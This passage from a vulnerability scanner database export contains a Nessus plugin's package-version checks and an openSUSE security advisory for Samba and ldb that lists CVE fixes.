reference:\"samba-test-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"samba-winbind-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libldb2-32bit-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libldb2-32bit-debuginfo-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi-devel-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-python3-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"python3-ldb-32bit-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"python3-ldb-32bit-debuginfo-2.0.12-lp152.2.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ad-dc-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-ceph-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.11.11+git.180.2cf3b203f07-lp152.3.6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ldb-debugsource / ldb-tools / ldb-tools-debuginfo / libldb-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-09-14T17:07:03", "description": "This update for ldb, samba fixes the following issues :\n\nChanges in samba :\n\n - Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\n - Update to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\n - Update to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existent paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + libsmb: Don't try to find posix stat info in\n SMBC_getatr().\n\n + ctdb-tcp: Move free of inbound queue to TCP restart;\n (bso#14295); (bsc#1162680).\n\n + s3/librpc/crypto: Fix double free with unresolved\n credential cache; (bso#14344); (bsc#1169095)\n\n + s3:libads: Fix ads_get_upn(); (bso#14336).\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294)\n\n + Starting ctdb node that was powered off hard before\n results in recovery loop; (bso#14295); (bsc#1162680).\n\n + ctdb-recoverd: Avoid dereferencing NULL rec->nodemap;\n (bso#14324)\n\n - Update to samba 4.11.8\n\n + CVE-2020-10700: Use-after-free in Samba AD DC LDAP\n Server with ASQ; (bso#14331); (bsc#1169850);\n\n + CVE-2020-10704: LDAP Denial of Service (stack overflow)\n in Samba AD DC; (bso#14334); (bsc#1169851);\n\n - Update to samba 4.11.7\n\n + s3: lib: nmblib. Clean up and harden nmb packet\n processing; (bso#14239).\n\n + s3: VFS: full_audit. Use system session_info if called\n from a temporary share definition; (bso#14283)\n\n + dsdb: Correctly handle memory in objectclass_attrs;\n (bso#14258).\n\n + ldb: version 2.0.9, Samba 4.11 and later give incorrect\n results for SCOPE_ONE searches; (bso#14270)\n\n + auth: Fix CIDs 1458418 and 1458420 NULL pointer\n dereferences; (bso#14247).\n\n + smbd: Handle EINTR from open(2) properly; (bso#14285)\n\n + winbind member (source3) fails local SAM auth with empty\n domain name; (bso#14247)\n\n + winbindd: Handling missing idmap in getgrgid();\n (bso#14265).\n\n + lib:util: Log mkdir error on correct debug levels;\n (bso#14253).\n\n + wafsamba: Do not use 'rU' as the 'U' is deprecated in\n Python 3.9; (bso#14266).\n\n + ctdb-tcp: Make error handling for outbound connection\n consistent; (bso#14274).\n\n - Update to samba 4.11.6\n\n + pygpo: Use correct method flags; (bso#14209).\n\n + vfs_ceph_snapshots: Fix root relative path handling;\n (bso#14216); (bsc#1141320).\n\n + Avoiding bad call flags with python 3.8, using\n METH_NOARGS instead of zero; (bso#14209).\n\n + source4/utils/oLschema2ldif: Include stdint.h before\n cmocka.h; (bso#14218).\n\n + docs-xml/winbindnssinfo: Clarify interaction with\n idmap_ad etc; (bso#14122).\n\n + smbd: Fix the build with clang; (bso#14251).\n\n + upgradedns: Ensure lmdb lock files linked; (bso#14199).\n\n + s3: VFS: glusterfs: Reset nlinks for symlink entries\n during readdir; (bso#14182).\n\n + smbc_stat() doesn't return the correct st_mode and also\n the uid/gid is not filled (SMBv1) file; (bso#14101).\n\n + librpc: Fix string length checking in\n ndr_pull_charset_to_null(); (bso#14219).\n\n + ctdb-scripts: Strip square brackets when gathering\n connection info; (bso#14227).\n\n - Add libnetapi-devel to baselibs conf, for wine usage;\n (bsc#1172307);\n\n - Installing: samba - samba-ad-dc.service does not exist\n and unit not found; (bsc#1171437);\n\n - Fix samba_winbind package is installing python3-base\n without python3 package; (bsc#1169521);\n\nChanges in ldb :\n\n - Update to version 2.0.12\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159).\n\n + ldb_ldap: fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + lib/ldb: add unit test for ldb_ldap internal code.\n\n - Update to version 2.0.11\n\n + lib ldb: lmdb init var before calling mdb_reader_check.\n\n + lib ldb: lmdb clear stale readers on write txn start;\n (bso#14330).\n\n + ldb tests: Confirm lmdb free list handling\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.", "edition": 3, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2020-07-21T00:00:00", "title": "openSUSE Security Update : ldb / samba (openSUSE-2020-1023)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-10700", "CVE-2020-10730", "CVE-2020-10760", "CVE-2020-14303", "CVE-2020-10704", "CVE-2020-10745"], "modified": "2020-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda", "p-cpe:/a:novell:opensuse:python3-ldb-debuginfo", "p-cpe:/a:novell:opensuse:libldb-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-python3", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "cpe:/o:novell:opensuse:15.2", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libldb2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:samba-python3", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:ldb-tools", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo", "p-cpe:/a:novell:opensuse:ldb-debugsource", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel", "p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libsamba-errors0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libsamba-errors0", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:python3-ldb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ldb-tools-debuginfo", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libldb2-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs-python3-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:python3-ldb-32bit", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsamba-errors-devel", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libldb2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libldb2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:samba-python3-debuginfo", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2020-1023.NASL", "href": "https://www.tenable.com/plugins/nessus/138790", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1023.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138790);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/23\");\n\n script_cve_id(\"CVE-2020-10700\", \"CVE-2020-10704\", \"CVE-2020-10730\", \"CVE-2020-10745\", \"CVE-2020-10760\", \"CVE-2020-14303\");\n\n script_name(english:\"openSUSE Security Update : ldb / samba (openSUSE-2020-1023)\");\n script_summary(english:\"Check for the openSUSE-2020-1023 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for ldb, samba fixes the following issues :\n\nChanges in samba :\n\n - Update to samba 4.11.11\n\n + CVE-2020-10730: NULL de-reference in AD DC LDAP server\n when ASQ and VLV combined; (bso#14364); (bsc#1173159]\n\n + CVE-2020-10745: invalid DNS or NBT queries containing\n dots use several seconds of CPU each; (bso#14378);\n (bsc#1173160).\n\n + CVE-2020-10760: Use-after-free in AD DC Global Catalog\n LDAP server with paged_result or VLV; (bso#14402);\n (bsc#1173161)\n\n + CVE-2020-14303: Endless loop from empty UDP packet sent\n to AD DC nbt_server; (bso#14417); (bsc#1173359).\n\n - Update to samba 4.11.10\n\n + Fix segfault when using SMBC_opendir_ctx() routine for\n share folder that contains incorrect symbols in any file\n name; (bso#14374).\n\n + vfs_shadow_copy2 doesn't fail case looking in\n snapdirseverywhere mode; (bso#14350)\n\n + ldb_ldap: Fix off-by-one increment in lldb_add_msg_attr;\n (bso#14413).\n\n + Malicous SMB1 server can crash libsmbclient; (bso#14366)\n\n + winbindd: Fix a use-after-free when winbind clients\n exit; (bso#14382)\n\n + ldb: Bump version to 2.0.11, LMDB databases can grow\n without bounds. (bso#14330)\n\n - Update to samba 4.11.9\n\n + nmblib: Avoid undefined behaviour in handle_name_ptrs();\n (bso#14242).\n\n + 'samba-tool group' commands do not handle group names\n with special chars correctly; (bso#14296).\n\n + smbd: avoid calling vfs_file_id_from_sbuf() if statinfo\n is not valid; (bso#14237).\n\n + Missing check for DMAPI offline status in async DOS\n attributes; (bso#14293).\n\n + smbd: Ignore set NTACL requests which contain S-1-5-88\n NFS ACEs; (bso#14307).\n\n + vfs_recycle: Prevent flooding the log if we're called on\n non-existent paths; (bso#14316)\n\n + smbd mistakenly updates a file's write-time on close;\n (bso#14320).\n\n + RPC handles cannot be differentiated in source3 RPC\n server; (bso#14359).\n\n + librpc: Fix IDL for svcctl_ChangeServiceConfigW;\n (bso#14313).\n\n + nsswitch: Fix use-after-free causing segfault in\n _pam_delete_cred; (bso#14327).\n\n + Fix fruit:time machine max size on arm; (bso#13622)\n\n + CTDB recovery corner cases can cause record resurrection\n and node banning; (bso#14294).\n\n + ctdb: Fix a memleak; (bso#14348).\n\n + 